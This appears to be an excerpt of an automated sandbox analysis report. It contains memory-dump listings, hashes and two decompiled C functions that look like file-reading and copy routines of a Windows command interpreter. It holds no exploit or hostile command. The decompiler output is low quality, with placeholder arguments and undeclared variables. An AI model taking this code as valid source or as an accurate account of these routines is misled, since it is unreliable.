                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 022E3F75
                                Memory Dump Source
                                • Source File: 00000009.00000002.2392323455.0000000002280000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true
                                • Associated: 00000009.00000002.2392311741.0000000002270000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392591356.0000000002360000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392597984.0000000002370000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392615842.0000000002374000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392633868.0000000002377000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392644032.0000000002380000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392726926.00000000023E0000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: BaseDataModuleQuery
                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                • API String ID: 3901378454-484625025
                                • Opcode ID: 68b6fcfb31a4a3d234d85668ce0545f9fb4f189211a9a201901cb050b68f51a2
                                • Instruction ID: f9ae1ebc9ae3707a9eca98359a35ab2391b8514acdf1257218499bbe6cef27a5
                                • Opcode Fuzzy Hash: 68b6fcfb31a4a3d234d85668ce0545f9fb4f189211a9a201901cb050b68f51a2
                                • Instruction Fuzzy Hash: A741DC7166030DBAEF20DAE4DCC5FEAB3FDAF14704F5005A9E509E6084EB709A459F61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A551A1A, Relevance: 13.8, APIs: 9, Instructions: 310COMMON
                                Download Yara Rule
                                C-Code - Quality: 39%
                                			E4A551A1A(void* __ecx, void* __eflags) {
				signed int _v8;
				long _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t46;
				intOrPtr _t48;
				signed int _t51;
				intOrPtr* _t54;
				intOrPtr _t60;
				void* _t61;
				signed int _t62;
				signed int _t66;
				signed int _t67;
				signed int _t68;
				intOrPtr* _t70;
				intOrPtr* _t74;
				signed int _t78;
				void* _t80;
				void* _t83;
				signed int _t85;
				signed int _t92;
				short _t94;
				long _t95;
				signed int _t96;
				signed int* _t97;
				void* _t98;
				long _t100;
				signed int _t101;
				signed int* _t104;
				signed int _t105;
				long _t106;
				signed int _t108;
				signed int _t111;
				signed int _t112;
				intOrPtr _t115;
				void* _t116;
				void* _t119;
				void* _t122;
				void* _t124;
				short* _t125;
				short* _t133;
				short _t134;
				intOrPtr* _t135;
				void* _t140;
				void* _t141;
				void* _t142;
				void* _t146;
				void* _t157;

				_push(__ecx);
				_push(__ecx);
				_push(_t108);
				_push(_t130);
				E4A551E6C(_t46);
				_t48 =  *0x4a574194; // 0x0
				_t111 =  *0x4a5741a0; // 0x0
				 *0x4a58c640 =  *((intOrPtr*)(_t48 - 2));
				_t51 = _t111 & 0x00000003;
				if(_t51 == 1) {
					 *0x4a590642 = 0;
					E4A55185A(0x4a58c642, 0x2002,  *0x4a57419c);
					_t54 = 0x4a58c642;
					_t18 = _t54 + 2; // 0x4a58c644
					_t122 = _t18;
					_t108 = 0;
					__eflags = 0;
					goto L25;
					L23:
					 *0x4a574194 = 0x4a58c642;
					E4A551EC6(_t108, _t111, 0x4a58c642, _t130);
					_t60 =  *0x4a574194; // 0x0
					 *0x4a574190 = _t60;
					return _t60;
					L25:
					_t112 =  *_t54;
					_t54 = _t54 + 2;
					__eflags = _t112;
					if(_t112 != 0) {
						goto L25;
					} else {
						_t111 =  *0x4a57419c; // 0x0
						 *0x4a57419c = _t111 + (_t54 - _t122 >> 1) * 2;
						goto L23;
					}
				}
				_t2 = _t51 - 2; // -2
				_t123 = _t2;
				if(_t2 > 1) {
					goto L23;
				}
				_t108 = 0;
				if(_t51 == 2) {
					L36:
					__eflags = 0x00008000 & _t111;
					if(__eflags != 0) {
						_push(_t108);
						_t51 = E4A5599E1(_t111);
						_t111 = 0x2352;
					} else {
						_t51 = E4A55C60C(_t108, _t123, 0x4a58c642, 0x8000, __eflags);
						 *0x4a5741a0 =  *0x4a5741a0 | 0x00008000;
					}
					L4:
					_t61 = E4A551E6C(_t51);
					_t133 = 0x4a57c640;
					_t141 =  *0x4a57419c - _t108; // 0x0
					if(_t141 == 0) {
						_t62 = E4A556BEA(_t61, _t108);
						__eflags = _t62;
						if(_t62 != 0) {
							L46:
							_v8 = _t108;
							while(1) {
								__imp___get_osfhandle( &_v12);
								_t66 = E4A554D9A(0x4a57c640 + _v8 * 2,  *0x4a57419c, 0x4a57c640 + _v8 * 2, 1);
								__eflags = _t66;
								if(_t66 != 0) {
									goto L49;
								}
								_t95 = GetLastError();
								__eflags = _t95 - 0xea;
								if(_t95 != 0xea) {
									L9:
									_t68 =  *0x4a57419c; // 0x0
									if(_v8 == _t108) {
										__eflags = _t68 - _t108;
										if(_t68 != _t108) {
											goto L10;
										}
										_t92 = E4A553B03(_t68, _t111, _t108);
										__eflags = _t92;
										if(_t92 != 0) {
											__eflags =  *0x4a59066c - _t108; // 0x0
											if(__eflags == 0) {
												goto L29;
											}
											_v8 = _v8 + 1;
											_t94 = 0xa;
											 *0x4a57c640 = _t94;
											L13:
											E4A554B3D(0x4a58c642, 0x2002, _t133, _v8);
											_t70 = 0x4a58c642;
											_t9 = _t70 + 2; // 0x4a58c644
											_t124 = _t9;
											goto L14;
											do {
												L16:
												_t123 =  *_t74;
												_t74 = _t74 + 2;
											} while (_t123 != _t108);
											_t130 = _t74 - _t116 >> 1;
											_t78 = E4A551996(0x4a58c642, E4A551BBC);
											_t111 = _v8;
											_v12 = _t78;
											if(_t78 >= _t74 - _t116 >> 1) {
												__eflags = _t111 - _t108;
												if(_t111 == _t108) {
													goto L18;
												}
												__eflags = _t78 - 0x2000;
												if(_t78 < 0x2000) {
													goto L23;
												}
												__eflags =  *0x4a574174 - 3;
												_t133 = 0x233f;
												L69:
												if(__eflags == 0) {
													__eflags =  *0x4a57408c - 1;
													if(__eflags == 0) {
														E4A55C60C(_t108, _t123, 0x4a58c642, _t133, __eflags);
														E4A5558F3();
														 *_t135 = 0x4a5745a8;
														E4A5558F3();
														_t111 = 0x4a58c642;
													}
													_push(_t108);
													E4A556D44(_t111);
													_t111 = _t133;
													E4A56FCA6(_t108, _t111, _t123, 0x4a58c642, _t133);
												}
												_push(_t108);
												_t83 = E4A556D44(_t111);
												_t119 = _t133;
												__eflags =  *0x4a57419c - _t108; // 0x0
												if(__eflags == 0) {
													_t85 = E4A553B03(_t83, _t119, _t108);
													__eflags = _t85;
													if(_t85 != 0) {
														E4A570175(_t108, _t123);
													}
												}
												L61:
												__imp__longjmp(0x4a574ac0, 0xffffffff);
												L62:
												E4A5558F3();
												_pop(_t111);
												L8:
												_v12 = _t108;
												goto L9;
											}
											L18:
											_t125 = 0x4a58c642 + _t78 * 2;
											if( *_t125 == 0x1a) {
												_t134 = 0xa;
												 *_t125 = _t134;
											}
											if( *_t125 != 0xa) {
												_t130 = 0;
												_v12 = 2;
											} else {
												_t125 = _t125 + 2;
												_t130 = _t111;
												_v12 = 1;
											}
											 *_t125 = 0;
											_t80 = E4A553B03(0, _t111,  *0x4a57419c);
											if(_t80 == 0) {
												_t130 =  ~_t130;
												__imp___get_osfhandle( *0x4a57419c, _t130, _t108, _v12);
												_pop(_t111);
												SetFilePointer(_t80, ??, ??, ??);
												_t157 =  *0x4a57419c - _t108; // 0x0
												if(_t157 == 0) {
													__eflags =  *0x4a5906ac - _t108; // 0x0
													if(__eflags == 0) {
														E4A55C5A0(0x4a58c642);
													}
												}
											}
											goto L23;
											L14:
											_t115 =  *_t70;
											_t70 = _t70 + 2;
											if(_t115 != _t108) {
												goto L14;
											} else {
												_v8 = _t70 - _t124 >> 1;
												_t74 = 0x4a58c642;
												_t11 = _t74 + 2; // 0x4a58c644
												_t116 = _t11;
												goto L16;
											}
										}
										L29:
										_push(2);
										E4A563787(_t111, 0x4a58c642, _t133);
										goto L69;
									}
									L10:
									_t146 =  *0x4a59066c - _t108; // 0x0
									if(_t146 == 0 && _v8 != _t108 && _t68 == _t108) {
										 *0x4a59066c = 1;
									}
									goto L13;
								}
								L49:
								__eflags = _v12 - _t108;
								if(_v12 != _t108) {
									_v8 = _v8 + 1;
									_t67 = _v8;
									__eflags =  *((short*)(0x4a57c63e + _t67 * 2)) - 0xa;
									if( *((short*)(0x4a57c63e + _t67 * 2)) != 0xa) {
										__eflags = _t67 - 0x2000;
										if(_t67 >= 0x2000) {
											goto L9;
										}
										continue;
									}
									goto L9;
								}
								goto L9;
							}
						}
						_t96 = E4A553B03(_t62, _t111, _t108);
						__eflags = _t96;
						if(_t96 == 0) {
							L41:
							__eflags =  *0x4a57419c - _t108; // 0x0
							if(__eflags != 0) {
								goto L5;
							}
							_t101 = E4A553B03(_t96, _t111, _t108);
							__eflags = _t101;
							if(_t101 == 0) {
								goto L5;
							}
							__eflags =  *0x4a574154 & 0x00000001;
							if(( *0x4a574154 & 0x00000001) == 0) {
								goto L5;
							}
							__eflags =  *0x4a5906bc - _t108; // 0x0
							if(__eflags != 0) {
								_t100 = E4A56E87B( &_v8,  *0x4a57419c, _t133, 0x2000,  &_v8);
								L34:
								_v12 = _t100;
								goto L9;
							}
							E4A551E6C(_t101);
							_t104 =  &_v8;
							__imp___get_osfhandle( *0x4a57419c, _t133, 0x2000, _t104);
							_pop(_t111);
							_push(_t104);
							_t105 = E4A5634E2();
							__eflags = _t105;
							if(_t105 == 0) {
								L33:
								_v8 = _t108;
								_t100 = GetLastError();
								goto L34;
							} else {
								__eflags = _v8 - _t108;
								if(_v8 != _t108) {
									goto L8;
								}
								_t106 = GetLastError();
								_push(0x4a5745a8);
								__eflags = _t106 - 0x3e3;
								if(_t106 != 0x3e3) {
									goto L62;
								}
								E4A5558F3();
								goto L61;
							}
							goto L46;
						}
						__eflags =  *0x4a574154 & 0x00000001;
						if(( *0x4a574154 & 0x00000001) == 0) {
							goto L46;
						}
						goto L41;
					}
					L5:
					_t97 =  &_v8;
					__imp___get_osfhandle( *0x4a57419c, _t133, 0x2000, _t97);
					_pop(_t111);
					_push(_t97);
					_t98 = E4A554D9A();
					_t142 =  *0x4a5741b4 - _t108; // 0x0
					if(_t142 != 0) {
						E4A551E6C(_t98);
						goto L61;
					}
					if(_t98 == _t108 || _v8 <= _t108) {
						goto L33;
					} else {
						goto L8;
					}
				}
				_t140 =  *0x4a57419c - _t108; // 0x0
				if(_t140 == 0) {
					goto L36;
				}
				goto L4;
			}





















































                                0x4a551a1f
                                0x4a551a20
                                0x4a551a21
                                0x4a551a22
                                0x4a551a24
                                0x4a551a29
                                0x4a551a32
                                0x4a551a38
                                0x4a551a40
                                0x4a551a4b
                                0x4a552dd1
                                0x4a552dd7
                                0x4a552ddc
                                0x4a552dde
                                0x4a552dde
                                0x4a552de1
                                0x4a552de1
                                0x4a552de1
                                0x4a551ba1
                                0x4a551ba1
                                0x4a551ba7
                                0x4a551bac
                                0x4a551bb3
                                0x4a551bba
                                0x4a552de3
                                0x4a552de3
                                0x4a552de7
                                0x4a552de8
                                0x4a552deb
                                0x00000000
                                0x4a552ded
                                0x4a552ded
                                0x4a552dfa
                                0x00000000
                                0x4a552dfa
                                0x4a552deb
                                0x4a551a51
                                0x4a551a51
                                0x4a551a57
                                0x00000000
                                0x00000000
                                0x4a551a5d
                                0x4a551a62
                                0x4a56342b
                                0x4a563430
                                0x4a563432
                                0x4a56362e
                                0x4a563634
                                0x4a56363a
                                0x4a563438
                                0x4a563438
                                0x4a56343d
                                0x4a56343d
                                0x4a551a74
                                0x4a551a74
                                0x4a551a79
                                0x4a551a7e
                                0x4a551a84
                                0x4a563449
                                0x4a56344e
                                0x4a563450
                                0x4a5635c8
                                0x4a5635c8
                                0x4a5635cb
                                0x4a5635e2
                                0x4a5635ea
                                0x4a5635ef
                                0x4a5635f1
                                0x00000000
                                0x00000000
                                0x4a5635f3
                                0x4a5635f9
                                0x4a5635fe
                                0x4a551ac7
                                0x4a551ac7
                                0x4a551acf
                                0x4a555788
                                0x4a55578a
                                0x00000000
                                0x00000000
                                0x4a555791
                                0x4a555796
                                0x4a555798
                                0x4a5636b8
                                0x4a5636be
                                0x00000000
                                0x00000000
                                0x4a5636c4
                                0x4a5636c9
                                0x4a5636ca
                                0x4a551aea
                                0x4a551af4
                                0x4a551af9
                                0x4a551afb
                                0x4a551afb
                                0x4a551afb
                                0x4a551b14
                                0x4a551b14
                                0x4a551b14
                                0x4a551b18
                                0x4a551b19
                                0x4a551b28
                                0x4a551b2a
                                0x4a551b2f
                                0x4a551b32
                                0x4a551b37
                                0x4a5557aa
                                0x4a5557ac
                                0x00000000
                                0x00000000
                                0x4a5557b2
                                0x4a5557b7
                                0x00000000
                                0x00000000
                                0x4a5636e6
                                0x4a5636ed
                                0x4a5636f2
                                0x4a5636f2
                                0x4a5636f4
                                0x4a5636fb
                                0x4a5636fd
                                0x4a563703
                                0x4a563708
                                0x4a56370f
                                0x4a563714
                                0x4a563714
                                0x4a563715
                                0x4a563717
                                0x4a56371d
                                0x4a56371e
                                0x4a56371e
                                0x4a563723
                                0x4a563725
                                0x4a56372b
                                0x4a56372c
                                0x4a563732
                                0x4a563739
                                0x4a56373e
                                0x4a563740
                                0x4a563746
                                0x4a563746
                                0x4a563740
                                0x4a563699
                                0x4a5636a0
                                0x4a5636a6
                                0x4a5636a6
                                0x4a5636ab
                                0x4a551ac4
                                0x4a551ac4
                                0x00000000
                                0x4a551ac4
                                0x4a551b3d
                                0x4a551b3d
                                0x4a551b48
                                0x4a563752
                                0x4a563753
                                0x4a563753
                                0x4a551b52
                                0x4a5557d3
                                0x4a5557d5
                                0x4a551b58
                                0x4a551b5b
                                0x4a551b5d
                                0x4a551b5f
                                0x4a551b5f
                                0x4a551b6e
                                0x4a551b71
                                0x4a551b78
                                0x4a551b7d
                                0x4a551b87
                                0x4a551b8d
                                0x4a551b8f
                                0x4a551b95
                                0x4a551b9b
                                0x4a56375b
                                0x4a563761
                                0x4a563768
                                0x4a563768
                                0x4a563761
                                0x4a551b9b
                                0x00000000
                                0x4a551afe
                                0x4a551afe
                                0x4a551b02
                                0x4a551b06
                                0x00000000
                                0x4a551b08
                                0x4a551b0c
                                0x4a551b0f
                                0x4a551b11
                                0x4a551b11
                                0x00000000
                                0x4a551b11
                                0x4a551b06
                                0x4a55579e
                                0x4a55579e
                                0x4a5557a0
                                0x00000000
                                0x4a5636d5
                                0x4a551ad5
                                0x4a551ad5
                                0x4a551adb
                                0x4a5636d7
                                0x4a5636d7
                                0x00000000
                                0x4a551adb
                                0x4a563604
                                0x4a563604
                                0x4a563607
                                0x4a563640
                                0x4a563643
                                0x4a563646
                                0x4a56364f
                                0x4a56360e
                                0x4a563613
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a563619
                                0x00000000
                                0x4a563651
                                0x00000000
                                0x4a563609
                                0x4a5635cb
                                0x4a563457
                                0x4a56345c
                                0x4a56345e
                                0x4a56346d
                                0x4a56346d
                                0x4a563473
                                0x00000000
                                0x00000000
                                0x4a56347a
                                0x4a56347f
                                0x4a563481
                                0x00000000
                                0x00000000
                                0x4a563487
                                0x4a56348e
                                0x00000000
                                0x00000000
                                0x4a563494
                                0x4a56349a
                                0x4a563666
                                0x4a5557cb
                                0x4a5557cb
                                0x00000000
                                0x4a5557cb
                                0x4a5634a0
                                0x4a5634a5
                                0x4a5634b5
                                0x4a5634bb
                                0x4a5634bc
                                0x4a5634bd
                                0x4a563670
                                0x4a563672
                                0x4a5557c2
                                0x4a5557c2
                                0x4a5557c5
                                0x00000000
                                0x4a563678
                                0x4a563678
                                0x4a56367b
                                0x00000000
                                0x00000000
                                0x4a563681
                                0x4a563687
                                0x4a56368c
                                0x4a563691
                                0x00000000
                                0x00000000
                                0x4a563693
                                0x00000000
                                0x4a563698
                                0x00000000
                                0x4a563672
                                0x4a563460
                                0x4a563467
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a563467
                                0x4a551a8a
                                0x4a551a8a
                                0x4a551a9a
                                0x4a551aa0
                                0x4a551aa1
                                0x4a551aa2
                                0x4a551aa7
                                0x4a551aad
                                0x4a5636b1
                                0x00000000
                                0x4a5636b1
                                0x4a551ab5
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a551ab5
                                0x4a551a68
                                0x4a551a6e
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                  • Part of subcall function 4A551E6C: EnterCriticalSection.KERNEL32(4A55851C), ref: 4A551E72
                                  • Part of subcall function 4A551E6C: LeaveCriticalSection.KERNEL32(?,4A551DBC,?,00000021,-00000003,4A588640,4A574210,00000000,00000000,?,4A551CE6,4A588640,4A574210,4A574210,?,4A551C8D), ref: 4A551E85
                                • _get_osfhandle.MSVCRT ref: 4A551B87
                                • SetFilePointer.KERNEL32(00000000,4A551DBC,?,00000021,-00000003,4A588640,4A574210,00000000,00000000,?,4A551CE6,4A588640,4A574210,4A574210,?,4A551C8D), ref: 4A551B8F
                                • GetLastError.KERNEL32(00000000,4A551E56,4A551F9D,-00000003,4A574210,4A574210,?,4A551DBC,?,00000021,-00000003,4A588640,4A574210,00000000,00000000), ref: 4A5557C5
                                • _get_osfhandle.MSVCRT ref: 4A551A9A
                                  • Part of subcall function 4A554D9A: SetFilePointer.KERNEL32(4A574210,00000000,00000000,00000001,4A58C642,4A57C640,00000000), ref: 4A554DB5
                                  • Part of subcall function 4A554D9A: ReadFile.KERNEL32(4A574210,4A576640,00000000,?,00000000), ref: 4A554DDD
                                  • Part of subcall function 4A554D9A: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,4A576640,4A574210,00000006,?), ref: 4A554E54
                                • _get_osfhandle.MSVCRT ref: 4A5634B5
                                • GetLastError.KERNEL32(00000000,4A551E56,4A551F9D,-00000003,4A574210,4A574210,?,4A551DBC,?,00000021,-00000003,4A588640,4A574210,00000000,00000000), ref: 4A563681
                                • longjmp.MSVCRT(4A574AC0,000000FF,4A58C642,4A551BBC,4A58C642,00002002,4A57C640,00000000,00000000,4A551E56,4A551F9D,-00000003,4A574210,4A574210,?,4A551DBC), ref: 4A5636A0
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: File_get_osfhandle$CriticalErrorLastPointerSection$ByteCharEnterLeaveMultiReadWidelongjmp
                                • String ID:
                                • API String ID: 3667609627-0
                                • Opcode ID: c477431965d47917ee71e0031c0599a6976ef249b09f80a64e77d3e5d407af3c
                                • Instruction ID: ab9c7c9ce917bf1b60ea83315ef67dec5c682426e26a19181fe04a07b7982804
                                • Opcode Fuzzy Hash: c477431965d47917ee71e0031c0599a6976ef249b09f80a64e77d3e5d407af3c
                                • Instruction Fuzzy Hash: 94A1D5B5911242EAE711BFA4CB489AD3FBCFF56328F10042BD509EA55DEB708E40CB51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55B8B1, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 370COMMON
                                Download Yara Rule
                                C-Code - Quality: 69%
                                			E4A55B8B1(void* __edx, void* __eflags, long _a4, intOrPtr _a8, char _a12, signed int _a16, intOrPtr _a20) {
				signed int _v8;
				short _v12;
				short _v14;
				char _v16;
				short _v536;
				short _v1056;
				short _v1576;
				char _v1577;
				char _v1578;
				char _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				intOrPtr _v1604;
				char _v1608;
				intOrPtr _v1612;
				intOrPtr _v1616;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t97;
				short _t102;
				short _t103;
				long _t105;
				intOrPtr _t111;
				intOrPtr _t113;
				intOrPtr _t122;
				signed int _t126;
				intOrPtr* _t137;
				long _t143;
				signed int _t144;
				intOrPtr* _t146;
				signed int _t150;
				short* _t151;
				WCHAR* _t153;
				intOrPtr* _t164;
				long _t170;
				intOrPtr* _t174;
				long _t189;
				void* _t196;
				signed int _t197;
				void* _t198;
				intOrPtr _t215;
				void* _t217;
				intOrPtr _t222;
				signed int _t230;
				long _t231;
				signed int _t232;

				_t97 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t97 ^ _t232;
				_t231 = _a4;
				_v1612 = _a8;
				_v1592 = _a16;
				_t197 = E4A55B512(_t196, __edx, _t231, 0x20);
				_t102 = 0x2a;
				_v16 = _t102;
				_t103 = 0x3f;
				_v14 = _t103;
				_v12 = 0;
				_t105 = _t231;
				_t198 = _t105 + 2;
				do {
					_t222 =  *_t105;
					_t105 = _t105 + 2;
				} while (_t222 != 0);
				E4A551996(_t231,  &_v16);
				asm("sbb edi, edi");
				_t230 =  ~(_t105 - _t198 >> 1);
				_v1600 = _t230;
				if(_t197 == 0xffffffff) {
					if(_a20 == 0) {
						L5:
						_v1578 = 2;
						L6:
						_v1577 = 1;
						L7:
						_t197 = _v1592;
						_t111 = 0x20;
						_v1604 = _t111;
						if(E4A553117(_t231, _t111,  *(_t197 + 0x18),  &_v1584) == 0) {
							_t113 = 0x10;
							_v1604 = _t113;
							if((E4A553117(_t231, _t113,  *(_t197 + 0x18),  &_v1584) & 0x000000ff) != 0) {
								goto L8;
							}
							_t189 =  *0x4a574128; // 0x0
							if(_t189 != 0x12) {
								if(_t230 != 0) {
									L37:
									_t189 = 0x234d;
									L40:
									_push(_t189);
									L41:
									L4A56DF02(_t207, _t222);
									L42:
									if(_a20 == 0) {
										_push(0x40002720);
										goto L41;
									}
									_v1578 = 1;
									_v1577 = 0;
									goto L7;
								}
								goto L40;
							}
							_t189 = 2;
							goto L40;
						}
						L8:
						_v1588 = _v1588 & 0x00000000;
						_v1592 = _v1592 & 0x00000000;
						_t231 = 0x104;
						E4A55185A( &_v1056, 0x104, 0x104);
						_t122 = E4A552148( &_v1056,  *0x4a590664 & 0x0000ffff) + 2;
						_v1616 = _t122;
						while( *0x4a5741b4 == 0) {
							_t207 = _t122 -  &_v1056 >> 1;
							E4A55185A(_t122, _t231 - (_t122 -  &_v1056 >> 1),  &(( *(_t197 + 0x18))[0x2c]));
							E4A55185A( &_v536, _t231, _v1612);
							if(_v1578 == 1) {
								E4A55185A(E4A552148( &_v536,  *0x4a590664 & 0x0000ffff) + 2, _t231 - (E4A552148( &_v536,  *0x4a590664 & 0x0000ffff) + 2 -  &_v536 >> 1),  &(( *(_t197 + 0x18))[0x2c]));
								_t137 =  &_v536;
								_t207 = _t137 + 2;
								do {
									_t222 =  *_t137;
									_t137 = _t137 + 2;
								} while (_t222 != 0);
								if(_t137 - _t207 >> 1 <= _t231) {
									goto L11;
								}
								E4A552F5C(_v1584);
								E4A55963C();
								_push(0x232e);
								goto L41;
							}
							L11:
							_t143 = GetFullPathNameW( &_v536, _t231,  &_v1576, 0);
							if(_t143 == 0 || _t143 >= _t231) {
								L33:
								_t144 = GetLastError();
								_t230 = _t144;
								if(_t230 != 0xb7) {
									if(_t230 == 1) {
										_t230 = 0x40002730;
									}
								} else {
									_t230 = 0x234d;
								}
								goto L59;
							} else {
								_t164 =  &_v1576;
								_t222 = _t164 + 2;
								do {
									_t207 =  *_t164;
									_t164 = _t164 + 2;
								} while (_t207 != 0);
								_t230 = _t164 - _t222 >> 1;
								_t170 = GetFullPathNameW( &_v1056, _t231,  &_v1576, 0);
								if(_t170 == 0 || _t170 >= _t231) {
									goto L33;
								} else {
									if(E4A55BBA4(_t230,  &_v1576, _t231,  &_v1596) == 0) {
										L66:
										if(E4A5595F8( *(_t197 + 0x18), _v1604, _v1584) == 0) {
											L25:
											E4A552F5C(_v1584);
											E4A55963C();
											_push(_v1588);
											_push("%9d");
											if(( *( *(_t197 + 0x18)) & 0x00000010) != 0) {
												_push(E4A559A2C());
												_push(1);
												_push(0x236d);
											} else {
												_push(E4A559A2C());
												_push(1);
												_push(0x236e);
											}
											E4A5599E1(_t217);
											_t126 = 0 | _v1592 != 0x00000000;
											L28:
											return E4A5513A9(_t126, _t197, _v8 ^ _t232, _t222, _t230, _t231);
										}
										_t122 = _v1616;
										continue;
									}
									_t174 =  &_v1576;
									_t222 = _t174 + 2;
									do {
										_t207 =  *_t174;
										_t174 = _t174 + 2;
									} while (_t207 != 0);
									_v1596 = _v1596 - (_t174 - _t222 >> 1);
									_t230 = _t230 + _v1596;
									if(_t230 > _t231) {
										_t230 = 0xce;
										L59:
										_v1592 = _t230;
										if(_v1600 != 0) {
											E4A5558F3(L"%s\r\n",  &_v1056);
											_pop(_t207);
										}
										_push(0);
										_push(_t230);
										E4A556D44(_t207);
										_t146 =  &_v536;
										_t222 = _t146 + 2;
										do {
											_t215 =  *_t146;
											_t146 = _t146 + 2;
										} while (_t215 != 0);
										_t150 = (_t146 - _t222 >> 1) - 1;
										_v1596 = _t150;
										_t151 = _t232 + _t150 * 2 - 0x214;
										if( *_t151 == 0x2e) {
											 *_t151 = 0;
										}
										_t153 =  &_v1056;
										__imp___wcsicmp( &_v536);
										_t217 = _t153;
										if(_t153 != 0) {
											L24:
											if(_v1577 == 0) {
												goto L66;
											}
										} else {
										}
										goto L25;
									}
									if(E4A55BB60( &_v1056,  &_v536,  &_a12,  &_v1608) == 0) {
										goto L33;
									}
									if(_v1608 != 0) {
										_v1588 = _v1588 + 1;
										if(_v1600 != 0) {
											E4A5558F3(L"%s\r\n",  &_v1056);
											_pop(_t217);
										}
									}
									goto L24;
								}
							}
						}
						E4A552F5C(_v1584);
						E4A55963C();
						_t126 = 1;
						goto L28;
					}
					if(E4A55BB60(_t231, _v1612,  &_a12,  &_v1608) == 0) {
						_t189 = GetLastError();
						if(_t189 != 0xb7) {
							if(_t189 == 1) {
								_t189 = 0x40002730;
							}
							goto L40;
						}
						goto L37;
					}
					E4A55963C();
					E4A5599E1(_t198, 0x236d, 1, E4A559A2C("%9d", 1));
					_t126 = 0;
					goto L28;
				}
				if(_t197 > 1) {
					goto L42;
				}
				_v1578 = 1;
				if(_a20 != 0) {
					goto L6;
				}
				goto L5;
			}




















































                                0x4a55b8bc
                                0x4a55b8c3
                                0x4a55b8cb
                                0x4a55b8cf
                                0x4a55b8db
                                0x4a55b8e6
                                0x4a55b8ea
                                0x4a55b8eb
                                0x4a55b8f1
                                0x4a55b8f2
                                0x4a55b8f8
                                0x4a55b8fc
                                0x4a55b8fe
                                0x4a55b901
                                0x4a55b901
                                0x4a55b905
                                0x4a55b906
                                0x4a55b916
                                0x4a55b91d
                                0x4a55b91f
                                0x4a55b921
                                0x4a55b92a
                                0x4a560e1a
                                0x4a55b946
                                0x4a55b946
                                0x4a55b94d
                                0x4a55b94d
                                0x4a55b954
                                0x4a55b954
                                0x4a55b95c
                                0x4a55b967
                                0x4a55b976
                                0x4a565ed9
                                0x4a565ee4
                                0x4a565ef6
                                0x00000000
                                0x00000000
                                0x4a565efc
                                0x4a565f04
                                0x4a565f0d
                                0x4a565ea0
                                0x4a565ea0
                                0x4a565eb1
                                0x4a565eb1
                                0x4a565eb2
                                0x4a565eb2
                                0x4a565eb7
                                0x4a565ebb
                                0x4a565ed0
                                0x00000000
                                0x4a565ed0
                                0x4a565ebd
                                0x4a565ec4
                                0x00000000
                                0x4a565ec4
                                0x00000000
                                0x4a565f0f
                                0x4a565f08
                                0x00000000
                                0x4a565f08
                                0x4a55b97c
                                0x4a55b97c
                                0x4a55b983
                                0x4a55b98b
                                0x4a55b998
                                0x4a55b9b2
                                0x4a55b9b3
                                0x4a55b9b9
                                0x4a55b9d7
                                0x4a55b9df
                                0x4a55b9f2
                                0x4a55b9fe
                                0x4a565f40
                                0x4a565f45
                                0x4a565f4b
                                0x4a565f4e
                                0x4a565f4e
                                0x4a565f52
                                0x4a565f53
                                0x4a565f5e
                                0x00000000
                                0x00000000
                                0x4a566045
                                0x4a56604a
                                0x4a56604f
                                0x00000000
                                0x4a56604f
                                0x4a55ba04
                                0x4a55ba15
                                0x4a55ba1d
                                0x4a560e67
                                0x4a560e67
                                0x4a565f70
                                0x4a565f78
                                0x4a565f84
                                0x4a565f86
                                0x4a565f86
                                0x4a565f7a
                                0x4a565f7a
                                0x4a565f7a
                                0x00000000
                                0x4a55ba2b
                                0x4a55ba2b
                                0x4a55ba31
                                0x4a55ba34
                                0x4a55ba34
                                0x4a55ba38
                                0x4a55ba39
                                0x4a55ba42
                                0x4a55ba55
                                0x4a55ba5d
                                0x00000000
                                0x4a55ba6b
                                0x4a55ba81
                                0x4a566000
                                0x4a566016
                                0x4a55bb03
                                0x4a55bb09
                                0x4a55bb0e
                                0x4a55bb19
                                0x4a55bb1f
                                0x4a55bb24
                                0x4a56605e
                                0x4a56605f
                                0x4a566061
                                0x4a55bb2a
                                0x4a55bb2f
                                0x4a55bb30
                                0x4a55bb32
                                0x4a55bb32
                                0x4a55bb37
                                0x4a55bb47
                                0x4a55bb4a
                                0x4a55bb58
                                0x4a55bb58
                                0x4a56601c
                                0x00000000
                                0x4a56601c
                                0x4a55ba87
                                0x4a55ba8d
                                0x4a55ba90
                                0x4a55ba90
                                0x4a55ba94
                                0x4a55ba95
                                0x4a55ba9e
                                0x4a55baaa
                                0x4a55baae
                                0x4a565f69
                                0x4a565f8b
                                0x4a565f92
                                0x4a565f98
                                0x4a565fa6
                                0x4a565fac
                                0x4a565fac
                                0x4a565fad
                                0x4a565faf
                                0x4a565fb0
                                0x4a565fb6
                                0x4a565fbd
